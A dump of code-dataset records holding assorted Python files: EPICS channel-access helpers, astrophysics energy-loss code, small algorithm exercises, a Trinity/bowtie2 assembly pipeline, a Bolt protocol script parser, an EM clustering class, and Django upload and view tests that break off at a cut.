1\nMAJOR_ALARM = 2\nINVALID_ALARM = 3\n\n_PVmonitors_ = {}\n\ndef caput(pvname, value, wait=False, timeout=60):\n \"\"\"caput(pvname, value, wait=False, timeout=60)\n simple put to a pv's value.\n >>> caput('xx.VAL',3.0)\n\n to wait for pv to complete processing, use 'wait=True':\n >>> caput('xx.VAL',3.0,wait=True)\n \"\"\"\n start_time = time.time()\n thispv = get_pv(pvname, timeout=timeout, connect=True)\n if thispv.connected:\n timeout -= (time.time() - start_time)\n return thispv.put(value, wait=wait, timeout=timeout)\n\ndef caget(pvname, as_string=False, count=None, as_numpy=True,\n use_monitor=False, timeout=5.0):\n \"\"\"caget(pvname, as_string=False,count=None,as_numpy=True,\n use_monitor=False,timeout=5.0)\n simple get of a pv's value..\n >>> x = caget('xx.VAL')\n\n to get the character string representation (formatted double,\n enum string, etc):\n >>> x = caget('xx.VAL', as_string=True)\n\n to get a truncated amount of data from an array, you can specify\n the count with\n >>> x = caget('MyArray.VAL', count=1000)\n \"\"\"\n start_time = time.time()\n thispv = get_pv(pvname, timeout=timeout, connect=True)\n if thispv.connected:\n if as_string:\n thispv.get_ctrlvars()\n timeout -= (time.time() - start_time)\n val = thispv.get(count=count, timeout=timeout,\n use_monitor=use_monitor,\n as_string=as_string,\n as_numpy=as_numpy)\n poll()\n return val\n\ndef cainfo(pvname, print_out=True, timeout=5.0):\n \"\"\"cainfo(pvname,print_out=True,timeout=5.0)\n\n return printable information about pv\n >>>cainfo('xx.VAL')\n\n will return a status report for the pv.\n\n If print_out=False, the status report will be printed,\n and not returned.\n \"\"\"\n start_time = time.time()\n thispv = get_pv(pvname, timeout=timeout, connect=True)\n if thispv.connected:\n conn_time = time.time() - start_time\n thispv.get(timeout=timeout-conn_time)\n get_time = time.time() - start_time\n thispv.get_ctrlvars(timeout=timeout-get_time)\n if print_out:\n ca.write(thispv.info)\n else:\n return thispv.info\n\ndef camonitor_clear(pvname):\n \"\"\"clear a monitor on a PV\"\"\"\n if pvname in _PVmonitors_:\n _PVmonitors_[pvname].remove_callback(index=-999)\n _PVmonitors_.pop(pvname)\n\ndef camonitor(pvname, writer=None, callback=None):\n \"\"\" camonitor(pvname, writer=None, callback=None)\n\n sets a monitor on a PV.\n >>>camonitor('xx.VAL')\n\n This will write a message with the latest value for that PV each\n time the value changes and when ca.poll() is called.\n\n To write the result to a file, provide the writer option a write method\n to an open file or some other method that accepts a string.\n\n To completely control where the output goes, provide a callback method\n and you can do whatever you'd like with them.\n\n Your callback will be sent keyword arguments for pvname, value, and\n char_value Important: use **kwd!!\n \"\"\"\n\n if writer is None:\n writer = ca.write\n if callback is None:\n def callback(pvname=None, value=None, char_value=None, **kwds):\n \"generic monitor callback\"\n if char_value is None:\n char_value = repr(value)\n writer(\"%.32s %s %s\" % (pvname, pv.fmt_time(), char_value))\n\n thispv = get_pv(pvname, connect=True)\n if thispv.connected:\n thispv.get()\n thispv.add_callback(callback, index=-999, with_ctrlvars=True)\n _PVmonitors_[pvname] = thispv\n\ndef caget_many(pvlist, as_string=False, count=None, as_numpy=True, timeout=5.0):\n \"\"\"get values for a list of PVs\n This does not maintain PV objects, and works as fast\n as possible to fetch many values.\n \"\"\"\n chids, out = [], []\n for name in pvlist: chids.append(ca.create_channel(name,\n auto_cb=False,\n connect=False))\n for chid in chids: ca.connect_channel(chid)\n for chid in chids: ca.get(chid, count=count, as_string=as_string, as_numpy=as_numpy, wait=False)\n for chid in chids: out.append(ca.get_complete(chid,\n count=count,\n as_string=as_string,\n as_numpy=as_numpy,\n timeout=timeout))\n return out\n\ndef caput_many(pvlist, values, wait=False, connection_timeout=None, put_timeout=60):\n \"\"\"put values to a list of PVs, as fast as possible\n This does not maintain the PV objects it makes. If\n wait is 'each', *each* put operation will block until\n it is complete or until the put_timeout duration expires.\n If wait is 'all', this method will block until *all*\n put operations are complete, or until the put_timeout\n duration expires.\n Note that the behavior of 'wait' only applies to the\n put timeout, not the connection timeout.\n Returns a list of integers for each PV, 1 if the put\n was successful, or a negative number if the timeout\n was exceeded.\n \"\"\"\n if len(pvlist) != len(values):\n raise ValueError(\"List of PV names must be equal to list of values.\")\n out = []\n pvs = [PV(name, auto_monitor=False, connection_timeout=connection_timeout) for name in pvlist]\n conns = [p.connected for p in pvs]\n wait_all = (wait == 'all')\n wait_each = (wait == 'each')\n for p, v in zip(pvs, values):\n out.append(p.put(v, wait=wait_each, timeout=put_timeout, use_complete=wait_all))\n if wait_all:\n start_time = time.time()\n while not all([(p.connected and p.put_complete) for p in pvs]):\n ca.poll()\n elapsed_time = time.time() - start_time\n if elapsed_time > put_timeout:\n break\n return [1 if (p.connected and p.put_complete) else -1 for p in pvs]\n else:\n return [o if o == 1 else -1 for o in out]\n\n\n","sub_path":"epics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"123120206","text":"#--------------------\n# Imports\n\nimport os\nfrom IgnoreDirs import IgnoreDirs\n\n#\n#--------------------\n\n\nclass Partitioner:\n\t\n\tdef __init__(self, basePath, partitionPaths, newDirs, ignoreDirs):\n\t\tself.basePath = basePath\n\t\tself.partitionPaths = partitionPaths.getPartitionPaths()\n\t\tself.newDirs = newDirs\n\t\tself.ignoreDirs = ignoreDirs.getIgnoredDirs()\n\n\t#Get's the file extension to determine which JSON directory the file will go into. (WORKS)\n\tdef getFileExtension(self, filePath):\n\t\tdotIndex = filePath.rfind(\".\", 0, len(filePath))\n\t\textension = filePath[dotIndex + 1:len(filePath)]\n\t\treturn extension\n\n\t#Get the file name without the extension. (WORKS)\n\tdef getFileName(self, filePath):\n\t\tdotIndex = filePath.rfind(\".\", 0, len(filePath))\n\t\tif (\"/\" in filePath):\n\t\t\tslashIndex = (filePath.rfind(\"/\", 0, len(filePath)) + 1)\n\t\telif (\"\\\\\" in filePath):\n\t\t\tslashIndex = (filePath.rfind(\"\\\\\", 0, len(filePath)) + 1)\n\t\telse: slashIndex = 0\n\t\tfileName = filePath[slashIndex:dotIndex]\n\t\treturn fileName\n\n\t#Create the keys and set the values as blank lists for the newDirs dictionary\n\tdef setUpDirsDict(self):\n\t\tfor key in self.partitionPaths.keys():\n\t\t\tself.newDirs[key] = []\n\n\t#Copies the file to the new path and appends them to the newDirs dictionary so they can be used by the parser.\n\tdef copyFileToNewPath(self, oldFilePath): \n\t\textension = self.getFileExtension(oldFilePath)\n\t\tfileName = self.getFileName(oldFilePath)\n\t\tfNe = (fileName + \".\" + extension)\n\t\toldFile = open(oldFilePath, \"r\")\n\t\tif (extension in self.partitionPaths.keys()):\n\t\t\tcpPath = self.partitionPaths[extension]\n\t\t\tif not os.path.exists(cpPath):\n\t\t\t\tos.makedirs(cpPath)\n\t\t\tnewFile = open((cpPath + fNe), \"w\")\n\t\t\tself.newDirs[extension].append(cpPath + fNe)\n\t\t\tfor line in oldFile:\n\t\t\t\tnewFile.write(line)\n\t\t\tnewFile.close()\n\t\telse: print(\"extension {\" + extension + \"} was not in the dirs list\")\n\n\tdef partitionAllFiles(self):\n\t\tfor (dirpath, dirnames, filenames) in os.walk(self.basePath):\n\t\t\ti = 1\n\t\t\t#Checks to make sure the dirpath isn't a part of the ignored directories list.\n\t\t\tfor ignoreDir in self.ignoreDirs:\n\t\t\t\t#The dirpath contained an ignored directory\n\t\t\t\tif ignoreDir in dirpath:\n\t\t\t\t\tprint(\"a substring of the file path {\" + dirpath + \"} was included in the Ignore Dirs list\")\n\t\t\t\t\ti = 0\n\t\t\t\t\tbreak\n\t\t\t#dirpath wasn't in the ignored directories list. So, continue to partition the files.\n\t\t\tif i == 1:\n\t\t\t\tfor fName in filenames:\n\t\t\t\t\ttmpName = (dirpath + \"/\" + fName)\n\t\t\t\t\tif self.getFileExtension(tmpName) in self.partitionPaths.keys():\n\t\t\t\t\t\tself.copyFileToNewPath(tmpName)\n\n","sub_path":"codeParse/back-end/python/Partitioner.py","file_name":"Partitioner.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"597095660","text":"#!/usr/bin/env python\nimport scipy as sp\nimport numpy as np\nimport astropy as astro\nimport math\nimport constants as const\nimport specShapes as specsh\nimport crossSection as crs\nimport model as mod\n\nfrom scipy import special\n\nclass energyLoss(object):\n ''' class that calculates energy losses for synchrotron, bremsstrhalung\n and IC\n it stores the cooling timescales for each process\n '''\n \n def __init__(self,spec='',proc='',source='',coolingType=''):\n self.spec=spec\n self.proc=proc\n self.source=source\n self.cType=coolingType\n\n def IC_Edot(self,Eph,Ee,EdNdE_ph):\n f = np.sqrt(Eph[1] / Eph[0])\n dEph = Eph * (f - 1/f)\n\n E_gb = np.logspace(np.log10(Ee) - 10., np.log10(Ee), 101)\n E_g = np.sqrt(E_gb[1:] * E_gb[:-1])\n dE_g = E_gb[1:] - E_gb[:-1]\n \n sgm = np.zeros_like(Eph)\n \n for i in range(len(E_g)):\n sgm += crs.sigmaIC(E_g[i], Eph, Ee)[:,0] * dE_g[i]\n\n\n return const.C*const.m2cm* np.sum(sgm * EdNdE_ph/Eph * dEph)\n\n def Sync_Edot(self,B,Ee,pitch):\n '''\n calculate the synchrotron energy loss for an electron with energy E_e\n INPUT:\n B - magn field (micro Gauss)\n pitch - sin of alpha (pitch angle)\n E_e - electron energy (GeV)\n OUTPUT:\n Edot - energy loss\n \n '''\n \n def bessel_int_values():\n #dr = 0.00005\n #rs = np.arange(0. + dr/2., 5., dr)\n rsb = np.logspace(-7., 1., 10001)\n rs = np.sqrt(rsb[1:] * rsb[:-1])\n dr = (rsb[1:] - rsb[:-1])\n \n\n nn = 5./3.\n ks = sp.special.kv(nn, rs)\n k_int = np.zeros_like(ks)\n\n k_int[0] = ks[0] * dr[0]\n for i in range(1, len(ks)):\n k_int[i] = k_int[i-1] + ks[i] * dr[i]\n k_tot = np.sum(ks * dr)\n k_int = k_tot - k_int\n\n return rs, k_int\n\n rs, k_int = bessel_int_values()\n\n func0 = sp.interpolate.interp1d(rs, k_int, fill_value=0.)\n def func(r):\n if r > 2.e-7 and r < 5.:\n return func0(r)\n else:\n return 0.\n\n bessel_int = np.frompyfunc(func, 1, 1)\n\n def synch_norm(B):\n '''\n normalization factor in synchrotron energy loss\n INPUT:\n B - magn field (micro Gauss)\n OUTPUT:\n normalization factor (GeV / s)\n\n '''\n return np.sqrt(3.) * const.eGauss**3 * 1.e-6 * B / const.ME_GeV * const.erg2GeV**2\n def nu_crit_norm(B):\n norm = 3 * const.H_Erg * const.C*const.m2cm * const.eGauss * 1.e-6 * const.erg2GeV**2* B / (4*np.pi * const.ME_GeV**3 * const.H_eV*1.e-9)\n #norm = 3 * ee * micro * B / (4*np.pi * me**3) * c_light * erg2GeV\n return norm\n\n def nu_critical(B, sin_al, E):\n '''\n critical frequency\n INPUT:\n B - magnetic field (micro Gauss)\n sin_al = sin(alpha),\n where alpha - angle between magnetic field and electron velocity\n E - electron energy (GeV)\n OUTPUT:\n critical frequency (Hz)\n \n '''\n norm = nu_crit_norm(B)\n \n if type(E) is np.ndarray and type(sin_al) is np.ndarray:\n return norm * np.outer(sin_al, E**2)\n else:\n return norm * sin_al * E**2\n \n def single_E(E):\n nuc = nu_critical(B, pitch, E)\n #print 'nuc = %.2e GHz' % (nuc / 1.e-9)\n nus = np.logspace(np.log10(nuc)-7., np.log10(nuc)+1., 200)\n f = np.sqrt(nus[1] / nus[0])\n d_nus = nus * (f - 1./f)\n SS = nus / nuc * bessel_int(nus / nuc)\n \n return synch_norm(B) * np.sum(SS * d_nus)\n \n edot_vec= np.frompyfunc(single_E, 1, 1)\n return edot_vec(Ee)\n","sub_path":"energyLoss.py","file_name":"energyLoss.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"498869981","text":"def longestSub(s, k):\n current = \"\"\n\n for i in reversed(range(len(s))):\n for j in range(i+1):\n sub = s[j:i+1]\n if isValid(sub, k) and len(sub) > len(current):\n current = sub\n \n return current\n \ndef isValid(s, k):\n counter = {}\n\n for char in s:\n if not char in counter:\n counter[char] = 1\n else:\n counter[char] += 1\n \n for el in counter:\n if counter[el] < k:\n return False\n\n return True\n\n\ns1 = 'aaabb'\nprint(longestSub(s1, 2))\n\n","sub_path":"string/longest_sub.py","file_name":"longest_sub.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"436686029","text":"# Dynamisk programmering, rekursiv funktion för p(n),\n# Gru_dat,Alexander Fagerlund\n\ndef p(n,h):\n \"\"\"Recursively calculates maximum profit...\n from making scarves from n meters of yarn, where\n n is a natural number.\n Time complexity: O(exp(n)).\"\"\"\n prev = 0\n if n == 0:\n return 0\n else:\n for i in range (1,n+1):\n if i <= 4:\n new = h[i]+p(n-i,h)\n if prev < new:\n prev = new\n else:\n new = p(n-i-1,h)\n if prev < new:\n prev = new\n maximum = prev\n return maximum\n\n\n# Unit test:\nh = [0,2,5,6,9]\nassert p(5,h) == 12\nassert p(4,h) == 10\nassert p(3,h) == 7\nassert p(2,h) == 5\nassert p(1,h) == 2\nassert p(0,h) == 0\n\n","sub_path":"Ovn6_scarves.py","file_name":"Ovn6_scarves.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"241967049","text":"#!/usr/bin/env python\n\nimport argparse\nimport sys\n\n# This script performs assembly on the reads leftover after host removal\n\n# -------------------------------------\n\ndef get_arg():\n \"\"\"Get Arguments\n :rtype: object\n \"\"\"\n # parse arguments\n\n prog_description = 'Trinity assembly'\n parser = argparse.ArgumentParser(description=prog_description)\n\n ## Trinity run without gunzipping the fastq files\n parser.add_argument('-1', '--mate1', default='host_separation/unmapped_1.fastq.gz', help='mate1')\n parser.add_argument('-2', '--mate2', default='host_separation/unmapped_2.fastq.gz', help='mate2')\n parser.add_argument('--single', default=None)\n parser.add_argument('-o', '--outputdir', default='assembly_trinity', help='the output directory')\n parser.add_argument('--trinitymem', required=True, help='max memory for Trinity')\n parser.add_argument('--trinitycores', required=True, help='number of cores for Trinity')\n parser.add_argument('--trinitythreshold', required=True, help='number of cores for Trinity')\n parser.add_argument('-l', '--logsdir', help='the logs directory')\n parser.add_argument('-d', '--scripts', help='the git repository directory')\n parser.add_argument('--noclean', help='do not delete temporary intermediate files (default: off)')\n parser.add_argument('--verbose', type=int, default=0, help='verbose mode: echo commands, etc (default: off)')\n args = parser.parse_args()\n\n # add key-value pairs to the args dict\n vars(args)['step'] = 'assembly'\n\n # need this to get local modules\n sys.path.append(args.scripts)\n global hp\n global ahp\n from helpers import helpers as hp\n from helpers import assembly_helpers as ahp\n\n # error checking: exit if previous step produced zero output\n\n if (args.single):\n hp.check_file_exists_and_nonzero(args.mate1, step=args.step)\n else:\n for i in [args.mate1, args.mate2]:\n hp.check_file_exists_and_nonzero(i, step=args.step)\n\n # this silly line casts the string False to the boolean value\n if args.single == 'False':\n args.single = False\n\n return args\n\n# -------------------------------------\n\ndef assembly(args):\n \"\"\"Do Trinity assembly\"\"\"\n\n hp.echostep(args.step)\n\n # print args\n print(args)\n print\n\n # mkdir -p assembly_trinity\n hp.mkdirp(args.outputdir)\n\n # perform Trinity assembly\n if (args.single):\n cmd = 'Trinity --seqType fq --normalize_reads --min_contig_length={args.trinitythreshold} --max_memory {args.trinitymem}G --CPU {args.trinitycores} --output {args.outputdir} --single {args.mate1}'.format(args=args)\n else:\n cmd = 'Trinity --seqType fq --normalize_reads --min_contig_length={args.trinitythreshold} --max_memory {args.trinitymem}G --CPU {args.trinitycores} --output {args.outputdir} --left {args.mate1} --right {args.mate2}'.format(args=args)\n # use run_long_cmd for programs with verbose output\n hp.run_long_cmd(cmd, args.verbose, 'log.Trinity')\n\n print('Trinity complete')\n\n # name of expected output file\n myoutput = args.outputdir + '/Trinity.fasta'\n\n # exit if no output\n hp.check_file_exists_and_nonzero(myoutput)\n\n # mkdir -p\n hp.mkdirp('assembly')\n\n # rename Trinity contigs, join sequence portion of fasta, return number of contigs\n # cat ${outputdir}/Trinity.fasta | awk 'BEGIN{f=0; counter=1}{if ($0~/^>/) {if (f) {printf \"\\n\"; counter++}; print \">contig_\"counter; f=1} else printf $0}END{printf \"\\n\"}' > ${output}\n myoutput2 = 'assembly/contigs_trinity.fasta'\n num_contigs = hp.fastajoinlines(myoutput, myoutput2, 'contig')\n\n # compute simple distribution\n # cat assembly/contigs_trinity.fasta | paste - - | awk '{print length($2)}' | sort -nr | ${d}/scripts/tablecount | awk -v tot=${num_contigs} 'BEGIN{x=0}{x+=$2; print $1\"\\t\"$2\"\\t\"x\"/\"tot\"\\t\"int(100*x/tot)\"%\"}' > assembly/contigs.distrib.txt\n ahp.computedistrib(myoutput2, 'assembly/contigs.distrib.txt')\n\n if not int(args.noclean):\n cmd = 'rm -rf assembly_trinity'\n hp.run_cmd(cmd, args.verbose, 0)\n\n hp.echostep(args.step, start=0)\n\n # return the name of assembly file\n return myoutput2\n\n# -------------------------------------\n\ndef remap(args, contigs):\n \"\"\"map contigs back onto assembly\"\"\"\n\n hp.echostep('remap')\n\n hp.mkdirp('assembly/ref_remap')\n\n refbowtie=\"assembly/ref_remap/ref\"\n\n cmd = 'bowtie2-build {} {}'.format(contigs, refbowtie)\n hp.run_cmd(cmd, args.verbose, 0)\n\n if (args.single):\n cmd = 'bowtie2 -p 4 -x {} -U {} -S {}'.format(refbowtie, args.mate1, 'assembly/reads2contigs.sam')\n else:\n cmd = 'bowtie2 -p 4 -x {} -1 {} -2 {} -S {}'.format(refbowtie, args.mate1, args.mate2, 'assembly/reads2contigs.sam')\n hp.run_cmd(cmd, args.verbose, 0)\n\n # convert to bam\n ## samtools version compatibility: need .bam extension\n cmd = 'samtools view -bS assembly/reads2contigs.sam | samtools sort -o assembly/reads2contigs.bam'\n hp.run_cmd(cmd, args.verbose, 0)\n\n cmd = 'samtools index assembly/reads2contigs.bam'\n hp.run_cmd(cmd, args.verbose, 0)\n\n cmd = 'rm assembly/reads2contigs.sam'\n hp.run_cmd(cmd, args.verbose, 0)\n\n # BAM index stats\n cmd = 'samtools idxstats assembly/reads2contigs.bam > assembly/reads2contigs.stats.txt'\n hp.run_cmd(cmd, args.verbose, 0)\n\n # mpileup\n cmd = 'samtools mpileup -A -B -d 100000 -L 100000 -f assembly/contigs_trinity.fasta assembly/reads2contigs.bam > assembly/reads2contigs.pileup'\n hp.run_cmd(cmd, args.verbose, 0)\n\n # format pileup file - i.e., add zeros to uncovered positions\n ahp.formatpileup('assembly/reads2contigs.pileup', 'assembly/reads2contigs.stats.txt', 'assembly/reads2contigs.format.pileup', 'assembly/reads2contigs.entropy')\n\n if not int(args.noclean):\n cmd = 'rm -r assembly/ref_remap'\n hp.run_cmd(cmd, args.verbose, 0)\n cmd = 'rm assembly/reads2contigs.pileup'\n hp.run_cmd(cmd, args.verbose, 0)\n\n hp.echostep('remap', start=0)\n\n# -------------------------------------\n\ndef main():\n \"\"\"Main function\"\"\"\n\n # get arguments\n args = get_arg()\n # assembly\n contigs = assembly(args)\n # remap\n remap(args, contigs)\n\n# -------------------------------------\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"scripts/assembly.py","file_name":"assembly.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"504518525","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport tensorflow as tf\n\nif tf.__version__ >= \"2.0.0\":\n import tensorflow.compat.v1 as tf\n\n\ndef dnn(inputs,\n hidden_units,\n hidden_activation=tf.nn.relu,\n output_activation=tf.nn.sigmoid,\n hidden_dropout=None,\n initializer=None):\n\n x = inputs\n for units in hidden_units:\n x = tf.layers.dense(x,\n units,\n activation=hidden_activation,\n kernel_initializer=initializer)\n\n if hidden_dropout is not None:\n x = tf.layers.dropout(x, rate=hidden_dropout)\n\n outputs = tf.layers.dense(x, 1, kernel_initializer=initializer)\n\n if output_activation is not None:\n outputs = output_activation(outputs)\n return outputs\n","sub_path":"deep_recommenders/estimator/models/feature_interaction/dnn.py","file_name":"dnn.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"609419891","text":"\"\"\"\nThe main idea is to count all the occurring characters in a string. \nIf you have a string like aba, then the result should be {'a': 2, 'b': 1}.\n\nWhat if the string is empty? Then the result should be empty object literal, {}.\n\"\"\"\n\n\ndef count(string):\n letter_counter = {}\n for letter in string:\n letter_counter[letter] = letter_counter.get(letter, 0) + 1\n return letter_counter\n","sub_path":"count_characters_in_your_string/count_characters_in_your_string.py","file_name":"count_characters_in_your_string.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"457703536","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Copyright (c) 2002-2016 \"Neo Technology,\"\n# Network Engine for Objects in Lund AB [http://neotechnology.com]\n#\n# This file is part of Neo4j.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom collections import deque\nfrom json import JSONDecoder\n\nfrom boltkit.client import CLIENT, SERVER, MAX_BOLT_VERSION, Structure\n\n\nclass Item(object):\n pass\n\n\nclass Line(Item):\n\n def __init__(self, protocol_version, line_no, peer, message):\n self.protocol_version = protocol_version\n self.line_no = line_no\n self.peer = peer\n self.message = message\n\n\nclass ExitCommand(Item):\n\n pass\n\n\nclass Script(object):\n\n def __init__(self, file_name=None):\n self.bolt_version = 1\n self.auto = []\n self.lines = deque()\n if file_name:\n self.append(file_name)\n\n def __nonzero__(self):\n return bool(self.lines)\n\n def __bool__(self):\n return bool(self.lines)\n\n def __len__(self):\n return len(self.lines)\n\n def parse_message(self, message):\n tag, _, data = message.partition(\" \")\n v = self.bolt_version\n if tag in CLIENT[v]:\n parsed_tag = CLIENT[v][tag]\n elif tag in SERVER[v]:\n parsed_tag = SERVER[v][tag]\n else:\n raise ValueError(\"Unknown message type %s\" % tag)\n decoder = JSONDecoder()\n parsed = []\n while data:\n data = data.lstrip()\n try:\n decoded, end = decoder.raw_decode(data)\n except ValueError:\n break\n else:\n parsed.append(decoded)\n data = data[end:]\n return Structure(parsed_tag, *parsed)\n\n def parse_command(self, message):\n tag, _, data = message.partition(\" \")\n if tag == \"\":\n return ExitCommand()\n else:\n raise ValueError(\"Unknown command %s\" % tag)\n\n def parse_lines(self, lines):\n mode = \"C\"\n for line_no, line in enumerate(lines, start=1):\n line = line.rstrip()\n if line == \"\" or line.startswith(\"//\"):\n pass\n elif len(line) >= 2 and line[1] == \":\":\n mode = line[0].upper()\n yield line_no, mode, line[2:].lstrip()\n elif mode is not None:\n yield line_no, mode, line.lstrip()\n\n def append(self, file_name):\n lines = self.lines\n with open(file_name) as f:\n for line_no, mode, line in self.parse_lines(f):\n if mode == \"!\":\n command, _, rest = line.partition(\" \")\n if command == \"AUTO\":\n self.auto.append(self.parse_message(rest))\n if command == \"BOLT\":\n self.bolt_version = int(rest)\n if self.bolt_version < 0 or self.bolt_version > MAX_BOLT_VERSION or CLIENT[self.bolt_version] is None:\n raise RuntimeError(\"Protocol version %r in script %r is not available \"\n \"in this version of BoltKit\" % (self.bolt_version, file_name))\n elif mode in \"CS\":\n if line.startswith(\"<\"):\n lines.append(Line(self.bolt_version, line_no, mode, self.parse_command(line)))\n else:\n lines.append(Line(self.bolt_version, line_no, mode, self.parse_message(line)))\n\n def match_auto_request(self, request):\n for message in self.auto:\n if request.tag == message.tag:\n return True\n elif request == message:\n return True\n return False\n\n def match_request(self, request):\n if not self.lines:\n return 0\n line = self.lines[0]\n if line.peer != \"C\":\n return 0\n if match(line.message, request):\n self.lines.popleft()\n return 1\n else:\n return 0\n\n def match_responses(self):\n responses = []\n while self.lines and self.lines[0].peer == \"S\":\n line = self.lines.popleft()\n if isinstance(line, Line):\n responses.append(line.message)\n elif isinstance(line, ExitCommand):\n pass\n else:\n raise RuntimeError(\"Unexpected response %r\" % line)\n return responses\n\n\ndef match(expected, actual):\n return expected == actual\n","sub_path":"boltkit/server/scripting.py","file_name":"scripting.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"238925071","text":"#!/usr/bin/env python3\n\n# https://jakevdp.github.io/PythonDataScienceHandbook/05.11-k-centers.html\n\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nfrom scipy.spatial import distance\nfrom math import floor\n\nclass MyExpectMax:\n def __init__(self, data, n_clusters, random_state=11, max_iters=100, cluster_std=1.0, tol=0.1):\n self.data = data\n self.n_clusters = n_clusters\n self.random_state = random_state\n self.max_iters = max_iters\n self.hidden_values = np.zeros((len(data), n_clusters))\n self.prev_centers = np.zeros((n_clusters, data.shape[1]))\n self.cluster_std = cluster_std\n self.cov = np.identity(data.shape[1]) * cluster_std\n self.tol = tol\n self.iters = 0\n\n def run(self):\n self.__choose_random_centers()\n while self.__total_distance(self.centers, self.prev_centers) > self.tol and self.iters < self.max_iters:\n self.__calc_hidden_values()\n self.__find_new_centers()\n self.iters += 1\n # Harden the clusters before returning.\n cluster_labels = np.array([np.argmax(row) for row in self.hidden_values])\n return cluster_labels, self.centers, self.iters\n\n def __choose_random_centers(self):\n np.random.seed(self.random_state)\n indices = np.random.choice(\n self.data.shape[0],\n size=self.n_clusters,\n replace=False\n )\n self.centers = self.data[indices]\n\n def __calc_hidden_values(self):\n distributions = np.array(\n [multivariate_normal(center, self.cov) for center in self.centers]\n )\n for i, point in enumerate(self.data):\n for j, distribution in enumerate(distributions):\n self.hidden_values[i, j] = distribution.pdf(point)\n z_sum = np.sum(self.hidden_values[i]) + 1e-300\n for j in range(self.n_clusters):\n self.hidden_values[i, j] = self.hidden_values[i, j] / z_sum\n\n def __find_new_centers(self):\n self.prev_centers = np.copy(self.centers)\n for i in range(self.n_clusters):\n self.centers[i] = np.average(self.data, axis=0, weights=self.hidden_values[:, i])\n\n def __total_distance(self, points1, points2):\n total = 0\n for i in range(points1.shape[0]):\n total += distance.euclidean(points1[i], points2[i])\n return total\n","sub_path":"a3/submit/classes/my_expect_max.py","file_name":"my_expect_max.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"462252213","text":"#Function to check whether it is prime number or not.\n# if prime\n# return true;\n# else\n# return false;\ndef isPrime(n):\n if n<2:\n return False\n for j in range(2,n):\n if n%j==0:\n return False\n\n return True\n\n#To check whether it is main class or not\nif(__name__==\"__main__\"):\n #Get input from user as integer\n user_input = int(input(\"Enter the number to find the number of prime numbers:\"))\n for i in range(1,user_input):\n if isPrime(i):\n print(i)\n","sub_path":"python/PrimeNumber.py","file_name":"PrimeNumber.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"628081839","text":"from collections import namedtuple\nimport json\nfrom urllib.parse import urlparse\nfrom django.conf import settings\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import Http404, QueryDict\nfrom django.test import TestCase, RequestFactory\n\nfrom utils.paginate import paginate\nfrom utils.uploads import split_extension, file_allowed, get_unique_upload_path\nfrom utils.views import json_render, json_redirect\n\n\nclass FakeModel:\n class Meta:\n app_label = 'testing'\n model_name = 'fake_model'\n\n def __init__(self):\n self._meta = FakeModel.Meta()\n\n\nclass Uploads(TestCase):\n def test_split_extension(self):\n \"\"\"\n Test that split_extension method works properly.\n \"\"\"\n scenarios = {\n 'awesome_filename.jpg': ['awesome_filename', 'jpg'],\n 'path/awesome_filename.GIF': ['path/awesome_filename', 'gif'],\n 'path/path/awesome_filename': ['path/path/awesome_filename', ''],\n }\n for input, output in scenarios.items():\n name, ext = split_extension(input)\n self.assertEqual(name, output[0])\n self.assertEqual(ext, output[1])\n\n def test_file_allowed(self):\n \"\"\"\n Test that file_allowed method works properly on all ALLOWED_EXTENSIONS\n and does not allow other file types.\n \"\"\"\n scenarios = {\n 'path/awesome_filename.exe': False,\n 'path/awesome_filename.dll': False,\n 'path/awesome_filename.sh': False,\n 'path/awesome_filename': False,\n }\n for ext in settings.ALLOWED_EXTENSIONS:\n scenarios['path/awesome_filename.{}'.format(ext)] = True\n for input, output in scenarios.items():\n result = file_allowed(input)\n self.assertEqual(result, output)\n\n def test_get_unique_upload_path(self):\n \"\"\"\n Test that get_unique_upload_path works properly.\n \"\"\"\n instance = FakeModel()\n filename = get_unique_upload_path(instance, 'image.jpg')\n self.assertEqual(len(filename), 55)\n self.assertEqual(filename[:19], 'testing/fake_model/')\n self.assertEqual(filename[-4:], '.jpg')\n\n\nclass Views(TestCase):\n def test_json_render(self):\n \"\"\"\n Test that the json_render view works properly.\n \"\"\"\n self.factory = RequestFactory()\n # raises an error if not an ajax request\n request = self.factory.get('/dummy')\n with self.assertRaises(PermissionDenied):\n response = json_render(request, 'base.html', {})\n # works fine if it is an ajax request\n request = self.factory.get(\n '/dummy', 